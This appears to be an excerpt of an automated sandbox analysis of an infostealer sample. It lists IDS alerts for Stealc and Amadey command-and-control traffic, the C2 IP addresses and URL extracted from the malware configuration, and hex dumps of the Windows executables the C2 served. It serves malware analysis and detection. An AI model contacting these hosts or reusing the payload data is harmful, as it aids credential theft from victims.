Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior

Source: chrome.exe

Memory has grown: Private usage: 1MB later: 30MB

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49717 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044244 - Severity 1 - ET MALWARE Win32/Stealc Requesting browsers Config from C2 : 192.168.2.6:49717 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044245 - Severity 1 - ET MALWARE Win32/Stealc Active C2 Responding with browsers Config : 185.215.113.206:80 -> 192.168.2.6:49717
Source: Network traffic	Suricata IDS: 2044246 - Severity 1 - ET MALWARE Win32/Stealc Requesting plugins Config from C2 : 192.168.2.6:49717 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 185.215.113.206:80 -> 192.168.2.6:49717
Source: Network traffic	Suricata IDS: 2044248 - Severity 1 - ET MALWARE Win32/Stealc Submitting System Information to C2 : 192.168.2.6:49717 -> 185.215.113.206:80
Source: Network traffic	Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:56481 -> 185.215.113.43:80
Source: Network traffic	Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.6:56488

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: 185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor	IPs: 185.215.113.43

Source: global traffic

TCP traffic: 192.168.2.6:56412 -> 1.1.1.1:53

Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 06:09:18 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 11:30:30 GMTETag: "10e436-5e7ec6832a180"Accept-Ranges: bytesContent-Length: 1106998Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 02 0d 00 d0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 84 25 0b 00 00 10 00 00 00 26 0b 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 7c 27 00 00 00 40 0b 00 00 28 00 00 00 2c 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 70 44 01 00 00 70 0b 00 00 46 01 00 00 54 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 c0 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 88 2a 00 00 00 d0 0c 00 00 2c 00 00 00 9a 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 d0 0c 00 00 00 00 0d 00 00 0e 00 00 00 c6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 10 0d 00 00 02 00 00 00 d4 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 20 0d 00 00 02 00 00 00 d6 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 30 0d 00 00 06 00 00 00 d8 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 18 3c 00 00 00 40 0d 00 00 3e 00 00 00 de 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 38 05 00 00 00 80 0d 00 00 06 00 00 00 1c 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 52 c8 00 00 00 90 0d 00 00 ca 00 00 00 22 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 5d 27 00 00 00 60 0e 00 00 28 00 00 00 ec 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 9a 2d 00 00 00 90 0e 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 06:09:41 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "a7550-5e7e950876500"Accept-Ranges: bytesContent-Length: 685392Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 06:09:43 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "94750-5e7e950876500"Accept-Ranges: bytesContent-Length: 608080Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 06:09:44 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "6dde8-5e7e950876500"Accept-Ranges: bytesContent-Length: 450024Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 06:09:45 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "1f3950-5e7e950876500"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 06:09:49 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "3ef50-5e7e950876500"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Sat, 23 Nov 2024 06:09:50 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTETag: "13bf0-5e7e950876500"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 